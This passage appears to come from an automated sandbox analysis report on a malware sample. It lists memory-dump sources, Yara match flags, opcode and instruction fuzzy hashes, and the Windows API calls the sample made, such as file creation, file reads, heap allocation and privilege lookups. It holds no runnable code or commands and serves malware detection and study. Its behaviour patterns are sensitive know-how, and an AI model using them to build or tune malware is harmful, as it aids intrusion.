                                                                    • Instruction Fuzzy Hash: 9190026921300012D2807569540860A000597D2352FD1D425A041569CCCF558869A361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4717eb11b922ca763f63cfd7994985204483ec7c517878153c8c28316d199e85
                                                                    • Instruction ID: e8ef55b3b4adbd1686dd807c2cf377ff9f5483e261f33cb6f195f739ed8e862f
                                                                    • Opcode Fuzzy Hash: 4717eb11b922ca763f63cfd7994985204483ec7c517878153c8c28316d199e85
                                                                    • Instruction Fuzzy Hash: C990027131114412D21065698404706000597D2351F91C421A0C2469CD8BD58891B162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d35692e5bdeb6eea3ffc547d5b26c18732cb8d71af201f7bd89186bc9d01a0bb
                                                                    • Instruction ID: 1ee415f62fcc7bc23197f2fae678f616f8e7c0287027dad8e4c0b17d9296dc0e
                                                                    • Opcode Fuzzy Hash: d35692e5bdeb6eea3ffc547d5b26c18732cb8d71af201f7bd89186bc9d01a0bb
                                                                    • Instruction Fuzzy Hash: 0D9002A120200013420575694414616400A97E1351B91C031E14146D4DCB658891B165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d511b65e941810c0a256b3fb727b9dca906328f8e29a90ebad8f942ee0e696bf
                                                                    • Instruction ID: 0c98212f9dd497fe65c9511947fc41b20cfd05617b1c987f29f40259d2469902
                                                                    • Opcode Fuzzy Hash: d511b65e941810c0a256b3fb727b9dca906328f8e29a90ebad8f942ee0e696bf
                                                                    • Instruction Fuzzy Hash: 2D9002B120100412D24075694404746000597D1351F91C021A5464698E8B998DD5B6A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 06248a724e25e8f3dcb049de536c6f6b90f5ba6462aed2669a074eaba68f80b7
                                                                    • Instruction ID: a99082bcae208ede5e477a693b704ce9cc5fb811fedd37e9e08f5394a0744ee1
                                                                    • Opcode Fuzzy Hash: 06248a724e25e8f3dcb049de536c6f6b90f5ba6462aed2669a074eaba68f80b7
                                                                    • Instruction Fuzzy Hash: 3B90027120100412D20069A95408646000597E1351F91D021A5424699ECBA58891B171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: a1f417d88bbf8ceab1296fea0d6ebfeb0c127f1256d65595fc8a1a235d2892f3
                                                                    • Instruction ID: 9d1491ed33fba1bba2825f2959545c9a1a3756fe485ba4a5fbc62be0d6ef70ed
                                                                    • Opcode Fuzzy Hash: a1f417d88bbf8ceab1296fea0d6ebfeb0c127f1256d65595fc8a1a235d2892f3
                                                                    • Instruction Fuzzy Hash: 2C900265211000130205A9690704507004697D63A1391C031F1415694CDB618861A161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                    • Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
                                                                    • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                    • Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID: &5A
                                                                    • API String ID: 1279760036-1617645808
                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                    • Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
                                                                    • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                    • Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (
                                                                    • API String ID: 0-3887548279
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (
                                                                    • API String ID: 0-3887548279
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1d18f76931eec532c383dcf8885f4cbc52efa6621afacd448ea28532cd0a7bc9
                                                                    • Instruction ID: 61cd57d2072392fc7a97888852fd84d8bcbb586f46090e9864607dc025de2440
                                                                    • Opcode Fuzzy Hash: 1d18f76931eec532c383dcf8885f4cbc52efa6621afacd448ea28532cd0a7bc9
                                                                    • Instruction Fuzzy Hash: A831A0116587F14ED31E836D08B9675AEC18E9720174EC2FEDADA6F3F3C0888408D3A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                    • Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
                                                                    • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                    • Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 18512cc22602838dbd03c0e1e7066ad10e8d7355b100ff0c0411712c92d1e501
                                                                    • Instruction ID: 361f27f1a81cd2c9f6af134fa7674f1d50b964825dd26805f452c38648ee03c4
                                                                    • Opcode Fuzzy Hash: 18512cc22602838dbd03c0e1e7066ad10e8d7355b100ff0c0411712c92d1e501
                                                                    • Instruction Fuzzy Hash: 1D4133739187A2CFD719DF38DA9A7813FB1F791320749834ECA9057092C738256ADB89
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3ce71f0b18b192eead0bdd58e6451f53a7d4a471ea843e5b1a893e27d91b5b14
                                                                    • Instruction ID: b04cdd777b13eb029ad178d631aa259a83c5c41265c149a7b635c52cc29cf17c
                                                                    • Opcode Fuzzy Hash: 3ce71f0b18b192eead0bdd58e6451f53a7d4a471ea843e5b1a893e27d91b5b14
                                                                    • Instruction Fuzzy Hash: DBC08C32D01A080BD6208D6CA9862B0FBB5E757270F40375FE80BE7254894AD4926248
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b0e20c8c03abd7a7042ea1e45eea7a4d3f6bbaece8f5276b37b475447ada751d
                                                                    • Instruction ID: a99fd93fac32b6c5bd72fbc59389829e61a1defbd79046b1edcb9b2863031fe3
                                                                    • Opcode Fuzzy Hash: b0e20c8c03abd7a7042ea1e45eea7a4d3f6bbaece8f5276b37b475447ada751d
                                                                    • Instruction Fuzzy Hash: 04B0921BA868285500106C5E78800B9E3A4D8CB229E10F3978D1CB32002406C81E80D8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3511af067845206802aa604ab3289e8b3ce08807f0d58701d70e4a09b83e750c
                                                                    • Instruction ID: 6c37e1900271d968a9ebdac2dec6771b5c852c920dd60c45b272dc951f77e813
                                                                    • Opcode Fuzzy Hash: 3511af067845206802aa604ab3289e8b3ce08807f0d58701d70e4a09b83e750c
                                                                    • Instruction Fuzzy Hash: 6FA0023BF864545464581C8DBC616B6D334D1C307AE243273D71CF3400C007C025115C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b94a4f12482cdb6efdba9c2386846f6c47d639a420c28446a8cbd46aad416873
                                                                    • Instruction ID: 63cca503431c8dd1c8ff9aa18e6ab7e204ccf95cc53cd150c245cbd0df88f728
                                                                    • Opcode Fuzzy Hash: b94a4f12482cdb6efdba9c2386846f6c47d639a420c28446a8cbd46aad416873
                                                                    • Instruction Fuzzy Hash: DE90026130100412D202656944146060009D7D2395FD1C022E1824699D8B658953F172
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9d8deefdfa6c58fd33f47903432cc1917a6a26a36edbfe1ab7c353d62ebae917
                                                                    • Instruction ID: 1bd9a6f03d0466b76adb689b63e4019c6efc6b18a30758c8feec7e5808e81240
                                                                    • Opcode Fuzzy Hash: 9d8deefdfa6c58fd33f47903432cc1917a6a26a36edbfe1ab7c353d62ebae917
                                                                    • Instruction Fuzzy Hash: 9990026120144452D24066694804B0F410597E2352FD1C029A4556698CCF558855A761
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6cb6653092890690eccd88d0f0fcc2143785d692337dd2de93896fd92ac096a2
                                                                    • Instruction ID: 1b475124c7f0ab1f77c158d518fcd05bc82513688904ffc89c104b6d9f05a117
                                                                    • Opcode Fuzzy Hash: 6cb6653092890690eccd88d0f0fcc2143785d692337dd2de93896fd92ac096a2
                                                                    • Instruction Fuzzy Hash: 8490027124100412D241756944046060009A7D1391FD1C022A0824698E8B958A56FAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9fbcc4fb523595eca0b2339669c419fa1526b44906ef6c8d1fc07ce817ca3b20
                                                                    • Instruction ID: 99b9b2669607286ce64b2c77ed4fa705ce2b68fb232351180d94e9dce7f3a380
                                                                    • Opcode Fuzzy Hash: 9fbcc4fb523595eca0b2339669c419fa1526b44906ef6c8d1fc07ce817ca3b20
                                                                    • Instruction Fuzzy Hash: 4F90027120140412D20065694808747000597D1352F91C021A5564699E8BA5C891B571
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 854d3753fe2eb3304056b637835a4e69d8c3486208fede35255a82d198eb159b
                                                                    • Instruction ID: fcb9ee078bbb9080dc5e4be5f9d3e6c2d57bac66f51f7fea830f253b79b00e0c
                                                                    • Opcode Fuzzy Hash: 854d3753fe2eb3304056b637835a4e69d8c3486208fede35255a82d198eb159b
                                                                    • Instruction Fuzzy Hash: 7D9002A1601140534640B56948044065015A7E23513D1C131A08546A4C8BA88855E2A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b21107234ae899ec7174343ac59d3d3ccf8639180e0e0e281c3d7c912521fe72
                                                                    • Instruction ID: 3f7536a0e90b538ea54ae7f8a844d5625d5c60f0905c3ee046da6d9f84ee6875
                                                                    • Opcode Fuzzy Hash: b21107234ae899ec7174343ac59d3d3ccf8639180e0e0e281c3d7c912521fe72
                                                                    • Instruction Fuzzy Hash: 4A9002A121100052D20465694404706004597E2351F91C022A2554698CCB698C61A165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 21dc198b780cf1b8b108b52993a5fd476e0af149226aee778b33d6071fc36065
                                                                    • Instruction ID: f9d28af493443c89fa83410307c98d55ae1e309b0a67ee7dcdef6422e039bd70
                                                                    • Opcode Fuzzy Hash: 21dc198b780cf1b8b108b52993a5fd476e0af149226aee778b33d6071fc36065
                                                                    • Instruction Fuzzy Hash: 5D9002A120140413D24069694804607000597D1352F91C021A2464699E8F698C51B175
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Executed Functions

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00EB3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00EB3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00EB821D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: .z`
                                                                    • API String ID: 823142352-1441809116
                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction ID: 7d3e24e0d4eef8c530966bdbd8658c79266ce4c26d8e2af8ebc4ddba8dcf1993
                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction Fuzzy Hash: 3FF0B6B2200108ABCB08CF88DC95DEB77EDAF8C754F158248BA0D97241C630E811CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 00EB82C5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID: !:
                                                                    • API String ID: 2738559852-3508929463
                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction ID: ef5d808fa01b8a3e6ab060428a3c462b4f9a5b015c5680b7dd776dc71dfc9305
                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction Fuzzy Hash: 3DF0A9B2200108ABCB14DF89DC91DEB77ADAF8C754F158649BA1DA7241D630E811CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00EB3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00EB3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00EB821D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: .z`
                                                                    • API String ID: 823142352-1441809116
                                                                    • Opcode ID: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
                                                                    • Instruction ID: cde6725c54a4f1bbcb5456a2b9e375852de2fe3aacdfc074df5ba7f6955bf934
                                                                    • Opcode Fuzzy Hash: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
                                                                    • Instruction Fuzzy Hash: 1AF0F8B2218148AF8B44CF9CDD94CEB77ADEB8C210B14465CFA5CC7204C631E802CB64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtClose.NTDLL(@=,?,?,00EB3D40,00000000,FFFFFFFF), ref: 00EB8325
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID: @=
                                                                    • API String ID: 3535843008-3903022579
                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction ID: 228046cde00c5c8e81c18b21d55d99a603d02f751b8435abf707da3dfd209b9c
                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction Fuzzy Hash: 8AD012752002186BD710EF98CC45ED7779CEF44750F154455BA186B242C570F90087E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
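
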